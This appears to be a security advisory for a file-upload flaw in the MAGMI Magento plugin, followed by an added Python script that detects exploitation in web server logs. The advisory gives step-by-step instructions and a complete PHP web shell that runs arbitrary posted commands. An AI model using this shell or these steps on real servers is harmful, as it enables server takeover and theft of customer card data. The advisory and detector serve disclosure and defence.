Exploit found date: 10/24/2014
Security Researcher name: Parvinder Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb - scorpio
Currently tested versions:
Magento version: Magento CE 1.8 and older
MAGMI version: v0.7.17a and older
Download links:
Magento server: http://www.magentocommerce.com/download
MAGMI plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
MAGMI (MAGento Mass Importer) suffers from a file inclusion vulnerability
(RFI) that allows an attacker to upload essentially any PHP file without
any sanity checks. The uploaded PHP file could then be used to skim credit
card data, rewrite files, run remote commands, delete files, etc. In effect,
this gives an attacker the ability to execute remote commands on the
vulnerable server.
Steps to reproduce:
1. Browse to http://<a magentosite.com>/magmi/web/magmi.php
2. Under "Upload new plugins", click on "choose file".
MAGMI plugins are basically PHP files zipped, so create a PHP shell and
zip it (e.g. evil.php packed into evil_plugin.zip). After the file has
been uploaded, the page will say: Plugin packaged installed.
evil.php:
<?php
// Proof-of-concept shell from the advisory: shows a command form and,
// when a command is posted, runs it with shell_exec() and prints the output.
if (isset($_POST['command'])) {
    echo "<form action='evil.php' method='post'>
        <input type='text' name='command' value=''/>
        <input type='submit' value='execute'/>
    </form>";
    if (function_exists('shell_exec')) {
        $command = $_POST['command'];
        $output  = shell_exec("$command");
        echo "<pre>$output</pre>";
    }
} else {
    // First visit: only render the form.
    echo "<form action='evil.php' method='post'>
        <input type='text' name='command' value=''/>
        <input type='submit' value='execute'/>
    </form>";
}
?>
3. Your malicious evil.php file has now been extracted. All you then need
to do is access it at:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you effectively have access to the entire system: download
any malware, install rootkits, skim credit card data, etc.
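For defenders, the two requests the advisory describes (a plugin upload POST to magmi/web/magmi.php, then a direct hit on a PHP file under magmi/plugins) leave a clear trace in web server access logs. The script below is an added example, not part of the advisory or of MAGMI; it assumes the plugin upload form posts to the same magmi.php URL given above, that PHP files under /magmi/plugins/ are never requested directly during normal use, and that the log is in Apache/nginx "combined" format. The sample log lines are constructed.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Plugin upload handler named in the advisory (assumption: the form posts here).
UPLOAD_PATH = "/magmi/web/magmi.php"
# Assumption: a browser never fetches plugin PHP files directly in normal use.
DIRECT_PLUGIN_RE = re.compile(r"^/magmi/plugins/[^/?]+\.php$", re.IGNORECASE)

def parse(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_magmi_plugin_abuse(lines):
    """Return (ip, severity, path) alerts.

    'high'   = a direct request to a plugin PHP file from an IP that earlier
               POSTed to the plugin upload handler (upload-then-execute pattern).
    'medium' = a successful direct request to a plugin PHP file with no upload seen.
    """
    uploaded = defaultdict(bool)   # ip -> has this client POSTed to the upload handler?
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, method = rec["ip"], rec["method"]
        path = rec["path"].split("?", 1)[0]   # drop any query string
        if method == "POST" and path == UPLOAD_PATH:
            uploaded[ip] = True
        elif DIRECT_PLUGIN_RE.match(path) and rec["status"].startswith("2"):
            alerts.append((ip, "high" if uploaded[ip] else "medium", path))
    return alerts

# Constructed sample log: one upload-then-execute sequence, one lone probe, one normal hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Oct/2014:10:01:02 +0000] "GET /magmi/web/magmi.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [24/Oct/2014:10:01:30 +0000] "POST /magmi/web/magmi.php HTTP/1.1" 200 5300',
    '203.0.113.5 - - [24/Oct/2014:10:02:10 +0000] "POST /magmi/plugins/evil.php HTTP/1.1" 200 412',
    '198.51.100.9 - - [24/Oct/2014:11:00:00 +0000] "GET /magmi/plugins/probe.php HTTP/1.1" 200 12',
    '192.0.2.77 - - [24/Oct/2014:11:05:00 +0000] "GET /index.php/catalog/ HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, severity, path in find_magmi_plugin_abuse(SAMPLE_LOG):
        print(f"{severity.upper():6} {ip:15} {path}")
```

A 'high' alert should be followed by checking the magmi/plugins directory for PHP files that are not part of a known plugin package.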